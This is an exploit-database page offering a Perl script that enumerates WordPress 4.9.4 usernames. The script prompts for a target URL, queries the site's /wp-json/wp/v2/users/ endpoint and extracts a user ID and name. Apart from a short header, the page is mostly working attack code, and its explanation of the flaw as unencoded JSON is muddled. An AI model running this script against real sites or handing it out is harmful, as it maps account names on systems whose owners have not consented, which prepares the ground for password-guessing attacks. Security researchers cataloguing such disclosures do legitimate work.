Wordpress 4.9.4 Username Enumeration (perl version)

2018.02.16
us dr-iman (US) us
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl ##################################################### # Title : Wordpress 4.9.4 Username Enumeration # Author : dr-iman # Vendor : https://wordpress.org/ # Software Link: https://wordpress.org/download/ # Version : 4.9.4 # Date : 17 Feb 2018 # Tested On : Ubuntu / Windows 10 # youtube : https://youtu.be/lie-IM_hRIY # Type : Remote ##################################################### # Descryption : # In Wordpress 4.9.4 We Can Find All Users Website # Directory wp-json/wp/v2/users/ # The Reason Of This Vuln ins wordpress don't encoded the json sources # usage : perl username.pl use LWP::UserAgent; my $ua = LWP::UserAgent->new; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print <<logo; _ _ _ _ | | | |___ ___ _| |___ ___ ___ ___ ___ | | | | . | _| . | . | _| -_|_ -|_ -| |_____|___|_| |___| _|_| |___|___|___| |_| logo print "\n[-] Wordpress 4.9.4 Username Enumeration\n"; print "\nEnter Target URL : "; my $url=<>; chomp($url); my $target = "$url/wp-json/wp/v2/users/"; my $content = $ua->get("$target")->content; if ($content =~ /"id":(.*?),/) { print "\nID : $1\n"; } if ($content =~ /"name":"(.*?)",/) { print "\nUsername : $1\n"; }

References:

https://www.youtube.com/watch?v=lie-IM_hRIY


Vote for this issue:
60%
40%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top